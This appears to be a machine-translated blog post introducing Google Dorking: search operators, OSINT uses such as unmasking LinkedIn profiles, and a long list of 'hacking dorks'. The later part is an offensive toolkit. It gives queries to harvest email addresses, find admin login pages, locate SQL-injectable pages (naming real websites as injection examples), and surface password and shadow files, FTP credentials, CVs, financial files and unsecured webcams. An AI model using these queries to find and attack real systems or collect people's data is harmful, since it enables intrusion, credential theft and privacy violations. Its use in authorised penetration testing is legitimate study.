<p>The first time I realized the power of Google Dork was when I searched for the Cisco Anyconnect software used to connect to Cisco VPNs.  However, Cisco does not allow software downloads, and a search for “Cisco Anyconnect” leads to many websites that only talk about software.  I&#8217;ve been looking at Google&#8217;s advanced search operators and found that I can search the titles of web pages.  After seeing that I could search by HTTP Headers, I came up with the idea that if I search for “Open Directory Listings”, the results will only be files.  I changed my search query to intitle: index.of cisco anyconnect and suddenly I found loads of results.  Finally, I downloaded the executable and then generated the MD5sum hash of the file, then compared it to what&#8217;s on the Cisco website.  After I found a matching file, I knew it hadn&#8217;t been tampered with and could run safely.</p>
<p>At the time, I didn&#8217;t know this was called Google Dorking, but until I came across BlackHat&#8217;s presentation. <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.blackhat.com%2Fpresentations%2Fbh-europe-05%2FBH_EU_05-Long.pdf" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Google Hacking for Penetration Testers</a>then I realized the full power of Google.</p>
<h2 id="ftoc-toan-tu-tim-kiem-nang-cao" class="ftwp-heading">Advanced search operator</h2>
<p>Using Advanced Search Operators allows you to find almost anything you want on the web.  Most people know about queries like site:hackthebox.com ext:pdf to display all PDF files hosted on a domain.  This can often be combined with exiftool to extract metadata from documents revealing usernames, dates, and potential software used.  However, many people don&#8217;t think of using it against cloud storage like site: drive.google.com hackthebox.  Thankfully, this search result doesn&#8217;t come up too often.  Google does not crawl drive.google.com itself, but instead searches for documents posted on the public internet.  My favorite Google Dorks are:</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-40625 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/04/1fEZoe21GVzGqkqaIbEdWCDActDzv3HO.jpg" alt="What is Google Dork?  Update Google Hacking Dork 2022 3" width="1170" height="1264" srcset="https://anonyviet.com/wp-content/uploads/2022/04/1fEZoe21GVzGqkqaIbEdWCDActDzv3HO.jpg 1170w, https://anonyviet.com/wp-content/uploads/2022/04/1fEZoe21GVzGqkqaIbEdWCDActDzv3HO-278x300.jpg 278w, https://anonyviet.com/wp-content/uploads/2022/04/1fEZoe21GVzGqkqaIbEdWCDActDzv3HO-948x1024.jpg 948w, https://anonyviet.com/wp-content/uploads/2022/04/1fEZoe21GVzGqkqaIbEdWCDActDzv3HO-768x830.jpg 768w, https://anonyviet.com/wp-content/uploads/2022/04/1fEZoe21GVzGqkqaIbEdWCDActDzv3HO-750x810.jpg 750w, https://anonyviet.com/wp-content/uploads/2022/04/1fEZoe21GVzGqkqaIbEdWCDActDzv3HO-1140x1232.jpg 1140w" sizes="auto, (max-width: 1170px) 100vw, 1170px" title="What is Google Dork?  Update Google Hacking Dork 2022 5"/></p>
<p>Try to apply by <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fhuong-dan-hack-email-bang-google-dork%2F" rel="noopener" class="local-link">Hack email with Google Dork</a> let see.</p>
<h2 id="ftoc-trang-web-va-inurl" class="ftwp-heading">Website and INURL</h2>
<p>Operators check the URL, I use the site most often because many sites have bad self-search functionality.  For example, if you used Reddit&#8217;s built-in search to search for ippsec and then used Google Search: site: reddit.com ippsec, you would probably get completely different results.</p>
<p>The INURL part is valid if you&#8217;re looking for a term in the URL but don&#8217;t care on which web page it&#8217;s used.  This is often used to measure the impact that web mining can have.  For example, if a vulnerability appeared with a WordPress plugin, I would look for the plugin&#8217;s filename and use inurl: file_used_by_plugin.php and see how many sites could be affected by this vulnerability.  Then I would create a list of bug bounty sites or participate in programs like Synack and then check if any of them appear on the list.</p>
<h2 id="ftoc-loai-tru" class="ftwp-heading">To exclude, to expel &#8211;</h2>
<p>Whenever a Google query is executed, placing a dash will subtract that query from the results.  This is extremely useful when trying to remove web pages or parts of URLs from the results.  Using -site: website.com will ensure that the site doesn&#8217;t appear in your search results.  This is also useful with inurl: piece because it can remove parts of the web page from the results.</p>
<h2 id="ftoc-truoc-va-sau" class="ftwp-heading">Before and after</h2>
<p>Google keeps records of when pages were first seen or last modified.  Using the before/after tag is a great way to narrow down your search.  There have been many times when a recent headline fills up Google search results.  Adding the before: tag is a great way to get rid of that.  Also, when an error occurs, I usually use the <strong>after:<date></strong> to find the latest evidence of attacks.  If the error appeared seven days ago, I can set the after tag to two days ago and try to find the latest evidence of newer bugs.</p>
<h2 id="ftoc-bo-nho-dem" class="ftwp-heading">Caching</h2>
<p>Websites will often show different information to search engines for Search Engine Optimization (SEO) reasons.  Using cache:url will allow you to view a web page returned to Google.  This is useful when the site is hiding information after a single login.  There is a misunderstanding around this feature, I have seen many people refer to this as “Passive Recon” which means that if you view a website through google cache it will not know you visited. access it.  This is not true because normally Google&#8217;s cache will not record some autoload links when viewing cached results and your browser will still make requests to the item web server pepper.</p>
<h2 id="ftoc-tim-kiem-nang-cao-cua-google" class="ftwp-heading">Google Advanced Search</h2>
<p>If you navigate to google.com/advanced_search, you&#8217;ll see a page that helps create a Google Dork and shows the syntax for performing a search.  The most interesting setting is being able to change the area to display the results.  Google provides the results it thinks are of interest to you, and one of the main determining factors is where you are.  For example, if I do a Search “Google”, the first result will go to google.com.  If I change the regional setting to UK it gives me the google.co.uk website.  This can be useful for sorting out the different countries an organization has its infrastructure in.  However, not all Google Dorks are for <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fosint-la-gi-osint-duoc-su-dung-nhu-the-nao-de-truy-vet-qua-internet%2F" rel="noopener" class="local-link">OSINT</a>, which is equally useful for finding foreign news.  Since I&#8217;m in Vietnam, if I search for UK-related news, Google will still prioritize Vietnamese websites that cover UK news.  If I do the same search related to UK but change the regional setting to UK, it will now favor UK local sites over Vietnam.</p>
<h2 id="ftoc-vi-du-ve-linkedin" class="ftwp-heading">Examples of LinkedIn</h2>
<p>My favorite demo of Google Dorking is with LinkedIn because I use it in most of my interactions to improve the amount of information gathered during the OSINT phase.  When you use LinkedIn to view employees of a company and do not have any connection to a person, LinkedIn will only show you their avatar, title, and location.  You don&#8217;t have a link to go to that person&#8217;s actual profile.</p>
<p>However, if you search like: linkedin.com jobtitle, Google will usually find a LinkedIn profile for you, which reveals their name.  Also, remember LinkedIn is a global company.  If the company I&#8217;m looking for employees in is in a different country than me, I&#8217;ll usually change my regional settings to match that company.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-40626 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/04/dMsJsC1gjPTTqvOSRARGwT05N1d5s9rn.png" alt="What is Google Dork?  Update Google Hacking Dork 2022 4" width="730" height="334" srcset="https://anonyviet.com/wp-content/uploads/2022/04/dMsJsC1gjPTTqvOSRARGwT05N1d5s9rn.png 730w, https://anonyviet.com/wp-content/uploads/2022/04/dMsJsC1gjPTTqvOSRARGwT05N1d5s9rn-300x137.png 300w" sizes="auto, (max-width: 730px) 100vw, 730px" title="What is Google Dork?  Update Google Hacking Dork 2022 6"/></p>
<h2 id="ftoc-tim-hieu-them-ve-google-dorks" class="ftwp-heading">Learn more about Google Dorks</h2>
<p>There&#8217;s so much more about Google Dorking beyond what I&#8217;ve talked about here, by far the best resource to visit is <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.exploit-db.com%2Fgoogle-hacking-database" rel="noopener noreferrer external nofollow" class="ext-link" onclick="this.target='_blank';">Exploit-DB&#8217;s Google Hacking Database</a>.  I am sure that when you start reading Google Dorks, you will find a lot of useful ideas for you.  Otherwise, search for different cloud service providers like Google Drive, OneDrive, Dropbox, etc.  and see how you can use Google to crawl those documents.</p>
<p>The google Pentest-Tools hack page is a great way to get started with Google Dorking.  I really like this site because it offers 14 different types of Google Dorks, such as searching for documents, logs or configuration files, and then opening Google Search on a new page.  This is a great way to get started with Google Dorking as it guides you through some of the popular Google Dorks.  However, in the end, you should be less dependent on this tool as it can limit creativity.</p>
<h2 id="ftoc-su-dung-cac-cong-cu-tu-dong" class="ftwp-heading">Using automated tools</h2>
<p>There are many automated tools that will run a large number of Google dorks for you and output text files for you to peruse.  This is beneficial because the main time consuming part of Google Dork is clicking through all of the Google pages.  If you just want a list of all the PDFs on a web page, it will take longer to write each URL than 10 URLs at a time (default results per page).  These tools change quite often so it&#8217;s hard to say which is the best, usable <strong>site:github.com after:(6 months ago) Google Dork</strong> and look for the most up-to-date tools.  However, one of the tools I like to use the most is <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fmadhavmehndiratta%2FdorkScanner" rel="noopener noreferrer external nofollow" class="ext-link" onclick="this.target='_blank';">dork scanner</a>.</p>
<h2 id="ftoc-google-hacking-dork-2022" class="ftwp-heading">Google Hacking Dork 2022</h2>
<p>Get Email Address from Google Dork?</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">site:facebook.com "anonyviet" "@gmail.com" &#13;
Hoặc nếu bạn muốn ID email theo địa danh thì hãy sử dụng Dork sau &#13;
site:facebook.com "anonyviet" "singapore" "@gmail.com"</pre>
<p>Find security holes with Google Dork</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">intext:bounty inurl:/security&#13;
inurl:"bug bounty" and intext:"€" and inurl:/security&#13;
inurl:"bug bounty" and intext:"$" and inurl:/security&#13;
inurl:"bug bounty" and intext:"INR" and inurl:/security</pre>
<p>Google queries to locate Web Servers</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">"Apache/1.3.28 Server at" intitle:index.of&#13;
Apache 1.3.2&#13;
"Apache/2.0 Server at" intitle:index.of&#13;
Apache 2.0&#13;
"Apache/* Server at" intitle:index.of&#13;
any version of Apache&#13;
"Microsoft-IIS/4.0 Server at" intitle:index.of&#13;
Microsoft Internet Information Services 4.0&#13;
"Microsoft-IIS/5.0 Server at" intitle:index.ofMicrosoft Internet Information Services 5.0&#13;
"Microsoft-IIS/6.0 Server at" intitle:index.of&#13;
Microsoft Internet Information Services 6.0&#13;
"Microsoft-IIS/* Server at" intitle:index.of&#13;
any version of Microsoft Internet Information Services&#13;
"Oracle HTTP Server/* Server at" intitle:index.of&#13;
any version of Oracle HTTP Server&#13;
"IBM _ HTTP _ Server/* * Server at" intitle:index.of&#13;
any version of IBM HTTP Server&#13;
"Netscape/* Server at" intitle:index.of&#13;
any version of Netscape Server&#13;
"Red Hat Secure/*" intitle:index.of&#13;
any version of the Red Hat Secure server&#13;
"HP Apache-based Web Server/*" intitle:index.of&#13;
any version of the HP server&#13;
Queries for discovering standard post-installation&#13;
intitle:"Test Page for Apache Installation" "You are free"&#13;
Apache 1.2.6&#13;
intitle:"Test Page for Apache Installation" "It worked!" "this Web site!"&#13;
Apache 1.3.0 – 1.3.9&#13;
intitle:"Test Page for Apache Installation" "Seeing this instead"&#13;
Apache 1.3.11 – 1.3.33, 2.0&#13;
intitle:"Test Page for the SSL/TLS-aware Apache Installation" "Hey, it worked!"&#13;
Apache SSL/TLS&#13;
intitle:"Test Page for the Apache Web Server on Red Hat Linux"&#13;
Apache on Red Hat&#13;
intitle:"Test Page for the Apache Http Server on Fedora Core"&#13;
Apache on Fedora&#13;
intitle:"Welcome to Your New Home Page!"&#13;
Debian Apache on Debian&#13;
intitle:"Welcome to IIS 4.0!"&#13;
IIS 4.0&#13;
intitle:"Welcome to Windows 2000 Internet Services"&#13;
IIS 5.0&#13;
intitle:"Welcome to Windows XP Server Internet Services"&#13;
IIS 6.0&#13;
Querying for application-generated system reports&#13;
"Generated by phpSystem"</pre>
<p>Find OS version, hardware configuration, logged in users, open connections, RAM and free disk space…</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">"This summary was generated by wwwstat"&#13;
web server statistics, system file structure&#13;
"These statistics were produced by getstats"&#13;
web server statistics, system file structure&#13;
"This report was generated by WebLog"&#13;
web server statistics, system file structure&#13;
intext:"Tobias Oetiker" "traffic analysis"&#13;
systemperformance statistics as MRTG charts, network configuration&#13;
intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)&#13;
server version, operating system type, child process list, current connections&#13;
intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"&#13;
web server activity, lots of visitor information&#13;
intitle:"Multimon UPS status page"&#13;
UPS device performance statistics&#13;
intitle:"statistics of" "advanced web statistics"&#13;
web server statistics, visitor information&#13;
intitle:"System Statistics" +"System and Network Information Center"</pre>
<p>System performance statistics in the form of MRTG charts, hardware configurations, running services</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">intitle:"Usage Statistics for" "Generated by Webalizer"&#13;
web server statistics, visitor information, system file structure&#13;
intitle:"Web Server Statistics for ****"&#13;
web server statistics, visitor information&#13;
nurl:"/axs/ax-admin.pl" -script&#13;
web server statistics, visitor information&#13;
inurl:"/cricket/grapher.cgi"&#13;
MRTG charts of network interface performance&#13;
inurl:server-info "Apache Server Information"&#13;
web server version and configuration, operating system type, system file structure&#13;
"Output produced by SysWatch *"&#13;
operating system type and version, logged users, free memory and disk space, mount points, running processes, system logs</pre>
<p>Find the Admin login link of the Website</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">admin1.php&#13;
admin1.html&#13;
admin2.php&#13;
admin2.html&#13;
yonetim.php&#13;
yonetim.html&#13;
yonetici.php&#13;
yonetici.html&#13;
admin/account.php&#13;
admin/account.html&#13;
admin/index.php&#13;
admin/index.html&#13;
admin/login.php&#13;
admin/login.html&#13;
admin/home.php&#13;
admin/controlpanel.html&#13;
admin/controlpanel.php&#13;
admin.php&#13;
admin.html&#13;
admin/cp.php&#13;
admin/cp.html&#13;
cp.php&#13;
cp.html&#13;
administrator/&#13;
administrator/index.html&#13;
administrator/index.php&#13;
administrator/login.html&#13;
administrator/login.php&#13;
administrator/account.html&#13;
administrator/account.php&#13;
administrator.php&#13;
administrator.html&#13;
login.html&#13;
modelsearch/login.php&#13;
moderator.php&#13;
moderator.html&#13;
moderator/login.php&#13;
moderator/login.html&#13;
moderator/admin.php&#13;
moderator/admin.html&#13;
account.php&#13;
account.html&#13;
controlpanel/&#13;
controlpanel.php&#13;
controlpanel.html&#13;
admincontrol.php&#13;
admincontrol.html&#13;
adminpanel.php&#13;
adminpanel.html&#13;
admin1.asp&#13;
admin2.asp&#13;
yonetim.asp&#13;
yonetici.asp&#13;
admin/account.asp&#13;
admin/index.asp&#13;
admin/login.asp&#13;
admin/home.asp&#13;
admin/controlpanel.asp&#13;
admin.asp&#13;
admin/cp.asp&#13;
cp.asp&#13;
administrator/index.asp&#13;
administrator/login.asp&#13;
administrator/account.asp&#13;
administrator.asp&#13;
login.asp&#13;
modelsearch/login.asp&#13;
moderator.asp&#13;
moderator/login.asp&#13;
moderator/admin.asp&#13;
account.asp&#13;
controlpanel.asp&#13;
admincontrol.asp&#13;
adminpanel.asp&#13;
fileadmin/&#13;
fileadmin.php&#13;
fileadmin.asp&#13;
fileadmin.html&#13;
administration/&#13;
administration.php&#13;
administration.html&#13;
sysadmin.php&#13;
sysadmin.html&#13;
phpmyadmin/&#13;
myadmin/&#13;
sysadmin.asp&#13;
sysadmin/&#13;
ur-admin.asp&#13;
ur-admin.php&#13;
ur-admin.html&#13;
ur-admin/&#13;
Server.php&#13;
Server.html&#13;
Server.asp&#13;
Server/&#13;
wp-admin/&#13;
administr8.php&#13;
administr8.html&#13;
administr8/&#13;
administr8.asp&#13;
webadmin/&#13;
webadmin.php&#13;
webadmin.asp&#13;
webadmin.html&#13;
administratie/&#13;
admins/&#13;
admins.php&#13;
admins.asp&#13;
admins.html&#13;
administrivia/&#13;
Database_Administration/&#13;
WebAdmin/&#13;
useradmin/&#13;
sysadmins/&#13;
admin1/&#13;
system-administration/&#13;
administrators/&#13;
pgadmin/&#13;
directadmin/&#13;
staradmin/&#13;
ServerAdministrator/&#13;
SysAdmin/&#13;
administer/&#13;
LiveUser_Admin/&#13;
sys-admin/&#13;
typo3/&#13;
panel/&#13;
cpanel/&#13;
cPanel/&#13;
cpanel_file/&#13;
platz_login/&#13;
rcLogin/&#13;
blogindex/&#13;
formslogin/&#13;
autologin/&#13;
support_login/&#13;
meta_login/&#13;
manuallogin/&#13;
simpleLogin/&#13;
loginflat/&#13;
utility_login/&#13;
showlogin/&#13;
memlogin/&#13;
members/&#13;
login-redirect/&#13;
sub-login/&#13;
wp-login/&#13;
login1/&#13;
dir-login/&#13;
login_db/&#13;
xlogin/&#13;
smblogin/&#13;
customer_login/&#13;
UserLogin/&#13;
login-us/&#13;
acct_login/&#13;
admin_area/&#13;
bigadmin/&#13;
project-admins/&#13;
phppgadmin/&#13;
pureadmin/&#13;
sql-admin/&#13;
openvpnadmin/&#13;
wizmysqladmin/&#13;
vadmind/&#13;
ezsqliteadmin/&#13;
hpwebjetadmin/&#13;
newsadmin/&#13;
adminpro/&#13;
Lotus_Domino_Admin/&#13;
bbadmin/&#13;
vmailadmin/&#13;
ccp14admin/&#13;
irc-macadmin/&#13;
banneradmin/&#13;
sshadmin/&#13;
phpldapadmin/&#13;
macadmin/&#13;
administratoraccounts/&#13;
admin4_account/&#13;
admin4_colon/&#13;
radmind-1/&#13;
Super-Admin/&#13;
AdminTools/&#13;
cmsadmin/&#13;
phpSQLiteAdmin/&#13;
server_admin_small/&#13;
database_administration/&#13;
system_administration/</pre>
<p>SQL injection Dork 2022</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">Update Imp. Dorks.&#13;
&#13;
Dork : "inurl:dettaglio.php?id="&#13;
&#13;
Exploit :&#13;
www.victim.com/sito/dettaglio.php?id=[SQL]&#13;
&#13;
Example :&#13;
http://www.cicloposse.com/dettaglio.php?id=61'&#13;
&#13;
Dork: inurl:prodotto.php?id)&#13;
&#13;
Exploit:&#13;
www.victim.com/prodotto.php?id=[SQL]&#13;
&#13;
Example:&#13;
http://www.poderimorini.com/en/prodotto.php?id=14'&#13;
&#13;
allinurl: \"index php go buy\"&#13;
allinurl: \"index.php?go=sell\"&#13;
allinurl: \"index php go linkdir\"&#13;
allinurl: \"index.php?go=resource_center\"&#13;
allinurl: \"resource_center.html\"&#13;
allinurl: \"index.php?go=properties\"&#13;
allinurl: \"index.php?go=register\"</pre>
<p>Database error messages, potentially containing function names, filenames, file structure information, SQL snippets, and passwords</p>
<p><code>"A syntax error has occurred" filetype:ihtml</code></p>
<p>Authorization error, potentially containing usernames, function names, file structure information, and SQL snippets</p>
<p><code>"Access denied for user" "Using password"</code></p>
<p>PHP errors related to permissions, potentially containing filenames, function names, and file structure information</p>
<p><code>"The script whose uid is" "is not allowed to access"</code></p>
<p>Oracle database error, potentially containing file names, function names, and file structure information</p>
<p><code>"ORA-00921: unexpected end of SQL command"</code></p>
<p>Cocoon errors, potentially containing Cocoon version information, filenames, function names, and file structure information</p>
<p><code>"error found handling the request" cocoon filetype:xml</code></p>
<p>Invision Power Board error, potentially containing function names, filenames, file structure information, and SQL snippets</p>
<p><code>"Invision Power Board Database Error"</code></p>
<p>MySQL database error, potentially containing username, function name, filename, and file structure information</p>
<p><code>"Warning: mysql _ query()" "invalid query"</code></p>
<p>CGI script errors, potentially containing operating system and program version information, user names, filenames, and file structure information</p>
<p><code>"Error Message : Error loading required libraries."</code></p>
<p>MySQL database error, potentially containing information about database structure and content</p>
<p><code>"#mysql dump" filetype:sql</code></p>
<p>Google Dork find Website Password</p>
<p>The site password, stored as the string “http://username:password@www…”</p>
<p><code>http://*:*@www" site</code></p>
<p>Backup file, potentially containing username and password</p>
<p><code>filetype:bak inurl:"htaccess|passwd|shadow|ht users"</code></p>
<p>mdb file, potentially containing password information</p>
<p><code>filetype:mdb inurl:"account|users|admin|admin istrators|passwd|password"</code></p>
<p>File pwd.db, potentially containing password information</p>
<p><code>intitle:"Index of" pwd.db</code></p>
<p>Folder with Admin information related to backup</p>
<p><code>inurl:admin inurl:backup intitle:index.of</code></p>
<p>WS_FTP configuration file, possibly containing the password to access the FTP server</p>
<p><code>"Index of/" "Parent Directory" "WS _ FTP.ini"</code></p>
<p><code>filetype:ini WS _ FTP PWD</code></p>
<p>File containing Microsoft FrontPage password</p>
<p><code>ext:pwd inurl:(service|authors|administrators |users) "# -FrontPage-"</code></p>
<p>The file containing the SQL code and password is inserted into the database</p>
<p><code>filetype:sql ("passwd values ****" | "password values ****" | "pass values ****" )</code></p>
<p>Trillian IM . configuration file</p>
<p><code>intitle:index.of trillian.ini</code></p>
<p>Eggdrop configuration file ircbot</p>
<p><code>eggdrop filetype:user</code></p>
<p>OpenLDAP configuration file</p>
<p><code>filetype:conf slapd.conf</code></p>
<p>WV Dial config file</p>
<p><code>inurl:"wvdial.conf" intext:"password"</code></p>
<p>Eudora mail client configuration file</p>
<p><code>ext:ini eudora.ini</code></p>
<p>Microsoft Access file, potentially containing user account information</p>
<p><code>filetype:mdb inurl:users.mdb</code></p>
<p><strong>Searching for private data and confidential documents</strong></p>
<p>File email.xls, potentially containing contact information</p>
<p><code>filetype:xls inurl:"email.xls"</code></p>
<p>Find someone&#8217;s job application</p>
<p><code>"phone * * *" "address *" "e-mail" intitle: "curriculum vitae"</code></p>
<p>Confidential document containing confidentiality clause</p>
<p><code>"not for distribution"</code></p>
<p>Contacts AIM</p>
<p><code>buddylist.blt</code></p>
<p>Contacts Trillian IM</p>
<p><code>intitle:index.of mystuff.xml</code></p>
<p>MSN Contacts</p>
<p><code>filetype:ctt "msn"</code></p>
<p>QDF database file for Quicken . financial application</p>
<p><code>filetype:QDF</code></p>
<p>Find information about finance, banking, credit cards</p>
<p><code>intitle:index.of finances.xls</code></p>
<p>Find Log Mail, possibly containing Email</p>
<p><code>intitle:"Index Of" -inurl:maillog maillog size</code></p>
<p>Report of security vulnerability scanning software</p>
<p><code>"Host Vulnerability Summary Report"</code></p>
<p><code>filetype:pdf "Assessment Report"</code></p>
<p><code>"This file was generated by Nessus"</code></p>
<p>Google Dork finds networked devices</p>
<p><code>"Copyright (c) Tektronix, Inc." "printer status"</code></p>
<p>PhaserLink printers</p>
<p><code>inurl:"printer/main.html" intext:"settings"</code></p>
<p>Brother HL printers</p>
<p><code>intitle:"Dell Laser Printer" ews</code></p>
<p>Dell printers with EWS technology</p>
<p><code>intext:centreware inurl:status</code></p>
<p>Xerox Phaser 4500/6250/8200/8400 printers</p>
<p><code>inurl:hp/device/this.LCDispatcher</code></p>
<p>HP printers</p>
<p><code>intitle:liveapplet inurl:LvAppl</code></p>
<p>Canon Webview webcams</p>
<p><code>intitle:"EvoCam" inurl:"webcam.html"</code></p>
<p>Evocam webcams</p>
<p><code>inurl:"ViewerFrame?Mode="</code></p>
<p>Panasonic Network Camera webcams</p>
<p><code>(intext:"MOBOTIX M1? | intext:"MOBOTIX M10?) intext:"Open Menu" Shift-Reload</code></p>
<p>Mobotix webcams</p>
<p><code>inurl:indexFrame.shtml Axis</code></p>
<p>Axis webcams</p>
<p><code>intitle:"my webcamXP server!" inurl:":8080?</code></p>
<p>webcams accessible via WebcamXP Server</p>
<p><code>allintitle:Brains, Corp.</code></p>
<p>camera webcams accessible via mmEye</p>
<p><code>intitle:"active webcam page"</code></p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;40623&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/what-is-google-dork-update-google-hacking-dork-2022/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2022/04/YgRt72CDbOPNX7jxYQppccDYAQPMv0kN.jpg" medium="image"></media:content>
            	</item>
	</channel>
</rss>
